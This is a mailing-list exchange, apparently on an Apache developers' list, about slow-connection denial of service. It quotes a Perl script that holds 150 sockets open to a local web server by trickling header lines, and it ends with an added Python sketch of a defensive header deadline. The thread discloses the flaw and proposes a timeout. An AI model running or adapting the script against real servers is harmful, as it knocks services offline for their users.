It doesn't.
Rasmus Lerdorf wrote:
> Turn on accept filtering and this problem goes away. Or at least it
> moves to be a kernel-level issue instead of an Apache one.
>
> -Rasmus
>
> Ivan Barrera A. wrote:
>
>> Hi...
>>
>> I'm still fighting (probably for a lost cause.. but my boss asked me to
>> do this).
>> In the socket activity there are some troubles dealing with timeouts.
>> It is pretty easy for anyone to DoS any Apache webserver.
>> I want to propose implementing a request timeout time, or at least a
>> check for incoming data.
>>
>> If you open many sockets to an apache server, you can keep it alive,
>> and make apache keep it open for a looong time, eating resources. If you
>> limit the number of connections per IP, you still can DoS apache using
>> 2 or more other IPs.
>>
>> All this was tested with Timeout set to 20, KeepAlive set to 5, and all
>> relevant options to their lowest value.
>>
>>
>> (one of the common scripts used to kill apache, is apache-squ1rt, I use
>> this other one to test)
>> Use this perl script to test :
>>
>> #!/usr/bin/perl
>>
>> my $Child = 150;
>> my $Sleep = 10;
>>
>> use IO::Socket;
>> use strict;
>>
>> my($c);
>> my(@SOCKET);
>> my($t);
>>
>> local $| = 1;
>>
>> $c=0;
>> for(0..$Child) {
>> @SOCKET[$c] = new IO::Socket::INET( Proto => "tcp",
>> PeerAddr=> "127.0.0.1:80");
>> $c++;
>> }
>>
>> for(0..$Child) {
>> if ( defined @SOCKET[$c]) {
>> $t = @SOCKET[$c];
>> print $t "GET / HTTP/1.1";
>> }
>> }
>>
>>
>> while(1){
>> $c=0;
>> # For each children
>> for(0..$Child) {
>> if ( defined @SOCKET[$c]) {
>> $t = @SOCKET[$c];
>> print $t "host: test.test";
>> }
>> $c++;
>> }
>> sleep ($Sleep);
>> }
>>
>> $c=0;
>> for(0..$Child) {
>> close(@SOCKET[$c++]);
>> }
>
>
>
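The request timeout proposed in the quoted message, sketched as an added example (not part of the thread and not Apache code): a reader that enforces an absolute deadline for the whole header block alongside a per-read idle timeout, run against a constructed local peer that sends one header line per interval and never finishes the request. The names `read_headers`, `slow_client` and `demo`, and the scaled-down timings, are assumptions made for the illustration.

```python
import socket
import threading
import time

def read_headers(conn, idle_timeout, total_deadline=None, max_bytes=8192):
    """Read up to the blank line that ends the header block.
    Returns (status, seconds_held)."""
    start, buf = time.monotonic(), b""
    held = lambda: time.monotonic() - start
    while b"\r\n\r\n" not in buf:
        wait, capped = idle_timeout, False
        if total_deadline is not None:
            remaining = total_deadline - held()
            if remaining <= 0:
                return "deadline_exceeded", held()
            if remaining < wait:           # the deadline, not idleness, limits this read
                wait, capped = remaining, True
        conn.settimeout(wait)
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            return ("deadline_exceeded" if capped else "idle_timeout"), held()
        if not chunk:
            return "closed", held()        # peer went away before finishing
        buf += chunk
        if len(buf) > max_bytes:
            return "too_large", held()
    return "complete", held()

def slow_client(sock, lines, interval):
    """Constructed test peer: one header line per interval, never the blank line."""
    try:
        sock.sendall(b"GET / HTTP/1.1\r\n")
        for _ in range(lines):
            time.sleep(interval)
            sock.sendall(b"Host: test.test\r\n")
    except OSError:
        pass                               # server already dropped the connection
    finally:
        sock.close()

def demo(total_deadline, idle_timeout=0.5, lines=8, interval=0.05):
    server, client = socket.socketpair()   # local pair, no network involved
    t = threading.Thread(target=slow_client, args=(client, lines, interval))
    t.start()
    result = read_headers(server, idle_timeout, total_deadline)
    server.close()
    t.join()
    return result

if __name__ == "__main__":
    print("idle timeout only:   ", demo(None))
    print("with header deadline:", demo(0.12))
```

With only the idle timeout, the connection is held until the peer chooses to close it, because every trickled line restarts the wait; with the deadline, the server releases the slot at a time it controls.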